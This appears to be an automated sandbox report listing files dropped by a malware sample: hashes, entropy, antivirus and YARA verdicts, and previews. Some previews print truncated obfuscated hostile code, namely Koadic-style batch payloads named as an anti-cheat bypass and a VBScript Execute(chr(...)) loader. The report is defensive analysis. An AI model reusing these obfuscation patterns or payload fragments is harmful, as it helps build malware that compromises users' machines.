                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\bFZYRLnRIz.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):1257951
                        Entropy (8bit):7.697708560370098
                        Encrypted:false
                        SSDEEP:24576:yuDXTIGaPhEYzUzA0bJw8roCiqKmJTk4HepZeDkiL5RWxgwhLUM09pKV:1Djlabwz9G8rwqze4HepAz5RXwlP0aV
                        MD5:43AF303E1F32CE8C477ABBFB07887EA2
                        SHA1:C69B0F73B6219D05CEC8258C445AF5F39D3313C9
                        SHA-256:37493D6B5FD0F186BB2E70EDFAFE91F28B43938293965461A7EEFB5CCA4C36BF
                        SHA-512:68D0ED901C7AA8BC6DE3F8D83FEA9C0A362D6582EA54B052941F9A02C25B9BB32B096BD8EFE73506985AD7B94EEA0757A35CB3924E845D8F69216CE999327774
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 71%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...j.................@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................
                        Process:C:\Users\user\Desktop\bFZYRLnRIz.exe
                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (4641), with no line terminators
                        Category:dropped
                        Size (bytes):9285
                        Entropy (8bit):4.62156305633747
                        Encrypted:false
                        SSDEEP:192:HTHycqfAJFHWYA0DN8Mie1qeqKnJTeg+pH/LwJRqr3zvIyqJNUT1VAgmr8qUIz+8:zHycqfAJFHWYA0DN8Mie1qeqKnJTeg+2
                        MD5:4C44AAB923A5C7719850E5138ECB64C0
                        SHA1:9634BB1DB8ED400B033225A849C88C7908D61B3D
                        SHA-256:63047A792BDE6EFB6AAB1A6DBB178F55B6AE86317D75CB4470E51DD0EF76BE2E
                        SHA-512:98FD476C2B48BE92A6101FF71514818ECA6C7849AD17097B86BABBBAE9ECC9FF60A0A88C143A6CCBB67F002798531AB3717AD3FD7246DE53C49B8DAAEEBAD8F0
                        Malicious:false
                        Yara Hits:
                        • Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat, Author: ditekSHen
                        Preview:..&@cls&@set "C...=MQEBbx7PntSmdIYNHj9J1UaRuoTvri245CVXe6Agc@3zkG0shwpZlODyqWK8fFL ".%C...:~41,1%%C...:~47,1%%C...:~36,1%%C...:~9,1%%C...:~63,1%".%C...:~51,1%%.gM.Tu.%%C...:~45,1%%C...:~28,1%=%C...:~20,1%%C...:~50,1%%C...:~1,1%%C...:~53,1%%C...:~42,1%%C...:~13,1%%C...:~3,1%%C...:~57,1%%C...:~63,1%%C...:~12,1%%C...:~24,1%%C...:~52,1%%C...:~6,1%%C...:~27,1%%..Jo.X.%%C...:~16,1%%C...:~45,1%%C...:~4,1%%C...:~19,1%%C...:~62,1%%C...:~26,1%%C...:~35,1%%C...:~31,1%%C...:~49,1%%C...:~11,1%%C...:~40,1%%C...:~28,1%%C...:~8,1%%C...:~17,1%%C...:~60,1%%C...:~22,1%%C...:~25,1%%C...:~39,1%%C...:~47,1%%C...:~18,1%%C...:~34,1%%C...:~23,1%%C...:~15,1%%C...:~7,1%%lj.U..%%C...:~32,1%%C...:~36,1%%C...:~30,1%%C...:~0,1%%C...:~59,1%%C...:~46,1%%C...:~44,1%%C...:~61,1%%C...:~9,1%%C...:~29,1%%C...:~21,1%%C...:~56,1%%C...:~2,1%%C...:~5,1%%C...:~10,1%%C...:~14,1%%C...:~51,1%%B.A....%%C...:~55,1%%C...:~41,1%%C...:~33,1%%C...:~58,1%%C...:~48,1%%C
                        Process:C:\Users\user\Desktop\bFZYRLnRIz.exe
                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (4292), with no line terminators
                        Category:dropped
                        Size (bytes):8587
                        Entropy (8bit):4.351435937551014
                        Encrypted:false
                        SSDEEP:96:059p3/0GDputigdMMUxh43lrpgx801nhLa+hY+E8twCril4:UMGDpuAgdyVxpDLlYF8twCril4
                        MD5:67789813C0D52FA2D7BFBFFD5D572E6E
                        SHA1:52389D023F55BDA8ABA2EFDBE82EE48C17F19639
                        SHA-256:AB044DF54893F5F2E54233FC6EA4EF6DD8A9A0731A893734F287E62EEAE0C3CF
                        SHA-512:467F875A6BF70A39FCB4918952706D41F92C0166C4C2AD2A9C6B2207C7AC076A155DBC9B7682E65F9F9498C3636BD2B04E2AAD5B2B89A185EA22BB6146980527
                        Malicious:true
                        Yara Hits:
                        • Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, Author: ditekSHen
                        Preview:..&@cls&@set "c..=T7haZox5FQE6NpSrgyAWbmOwLjsIYJVC8eRv0l3G1Xf4@H9PuB dztc2MqnDiKkU".%c..:~44,1%%c..:~26,1%%c...J.%%c..:~33,1%%c..:~53,1%%c..:~50,1%"....=%c..:~17,1%%c..:~47,1%%c..:~60,1%%c..:~7,1%%.R...%%c..:~33,1%%c..:~4,1%%c..:~10,1%%c..:~11,1%%c..:~61,1%%c..:~14,1%%c..:~44,1%%c..:~51,1%%c..:~36,1%%c..:~8,1%%c..:~30,1%%c..:~42,1%%c..:~39,1%%c..:~24,1%%c..:~40,1%%c..:~12,1%%c..:~25,1%%c..:~1,1%%c..:~23,1%%c..:~3,1%%c..:~49,1%%c..:~29,1%%c..:~16,1%%c..:~46,1%%c..:~19,1%%c..:~53,1%%c..:~22,1%%c..:~52,1%%c..:~56,1%%c..:~27,1%%c..:~59,1%%c..:~5,1%%c..:~58,1%%c..:~62,1%%c..:~32,1%%c..:~15,1%%c..:~43,1%%c..:~34,1%%c..:~2,1%%c..:~18,1%%c..:~41,1%%c..:~26,1%%c..:~35,1%%whL.b.%%c..:~0,1%%c..:~63,1%%c..:~28,1%%L..y.SQ%%c..:~13,1%%c..:~45,1%%c..:~20,1%%c..:~50,1%%c..:~9,1%%c..:~31,1%%c..:~48,1%%c..:~21,1%%c..:~37,1%%c..:~54,1%%c..:~6,1%%c..:~57,1%%c..:~55,1%%c..:~38,1%".%....:~10,1%%....:~45,1%%....:~4,1%%....:~29,1%%....:~53,1%"%....:~11,1%.%....:~9,1%=%....:~39,1%%....:~14,1%%..
                        Process:C:\Users\user\Desktop\bFZYRLnRIz.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):608296
                        Entropy (8bit):7.514584223403157
                        Encrypted:false
                        SSDEEP:12288:V5sK6lf7w8tHcFQzWm6YWjKmJc5E8vbjjPBPmzhC7cF0RQmbys2EO:Vx6jKQz5Cx9bU7r2zt
                        MD5:B6C3C00D7CF6D8D13F20DBC590A675AD
                        SHA1:A36E5C3C94F7ABE3CBDFD3418E3AE03E66AA5323
                        SHA-256:0021B20ECB3A2D562118BAE38F00D1BDFFC8FACDA49C8E1D1995966E1CD7957C
                        SHA-512:E6F5165B9678CC6818D0213E84A6FDFB606AF69DD6BE67EA3DB12DBB4A8B3503AFCB9DC729A727691BEF2374A355EA3AB7D8F8864ADCAB87D0CFEE892C660EBA
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 39%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h.R.,.<.,.<.,.<...?.>.<...9.<...8.:.<.. 8.>.<...=.%.<.,.=.<.. 9.r.<.. ?.4.<..#5.-.<..#<.-.<..#>.-.<.Rich,.<.........................PE..L....uf...............'.v...........q............@..........................`............@..........................Q..P....R..d...................."..(&...0...&......................................@............................................text....t.......v.................. ..`.rdata...............z..............@..@.data........`.......F..............@....BSs....C.... ......................@....reloc...&...0...(..................@..B................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\bFZYRLnRIz.exe
                        File Type:ASCII text, with very long lines (1168), with CRLF line terminators
                        Category:dropped
                        Size (bytes):1170
                        Entropy (8bit):4.253340662989982
                        Encrypted:false
                        SSDEEP:24:6yMqf2/aWEXMhPwWqT5a+D8+QhXZa8KksM6XimbBBNNXBjXOR8KZ:q/G17wqksQMRj5u
                        MD5:F6C38031293030EF28E5806ABB9D072D
                        SHA1:1C5C39F986C9E717D85321536E44541AA3A6F33B
                        SHA-256:76166B3A990A0F6606FA9AD1ED52DAA04CE37F813865C539E5D1F68DA9EBEBA1
                        SHA-512:8BFBAC376E92CE870310926BDF42FBCCE4EC10829E508C6E2B546D25DA77B78AD8F2B7718C5CC1409962DA7214D83F379B3EE6CBA6B9849A3A525AA4029035B2
                        Malicious:true
                        Preview:Execute(chr(7546/98)& chr(42+73)& chr(2678/26)& chr(40+26)& chr(52+59)& chr(184-64)& chr(2688/84)& chr(118-84)& chr(-1+70)& chr(19*6)& chr(175-61)& chr(1332/12)& chr(10032/88)& chr(32*1)& chr(134-30)& chr(195-98)& chr(209-94)& chr(54-22)& chr(2553/23)& chr(1287/13)& chr(22+77)& chr(5616/48)& chr(46+68)& chr(130-29)& chr(89+11)& chr(142-96)& chr(25+7)& chr(1*84)& chr(77+37)& chr(3872/32)& chr(1824/57)& chr(72+44)& chr(6993/63)& chr(-12+44)& chr(68+32)& chr(7560/72)& chr(9085/79)& chr(3589/37)& chr(4998/51)& chr(129-21)& chr(3838/38)& chr(35-3)& chr(105+16)& chr(101+10)& chr(121-4)& chr(212-98)& chr(92-60)& chr(36+51)& chr(11+94)& chr(22*5)& chr(158-58)& chr(181-70)& chr(44+75)& chr(2990/26)& chr(2656/83)& chr(106-38)& chr(111-10)& chr(6018/59)& chr(4949/49)& chr(166-56)& chr(10*10)& chr(141-40)& chr(4560/40)& chr(2880/90)& chr(54+43)& chr(4400/40)& chr(58+42)& chr(288/9)& chr(199-83)& chr(31+83)& chr(130-9)& chr(26+6)& chr(153-56)& chr(188-85)& chr(7+90)& chr(60+45)& chr(65+45)& chr(-27
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
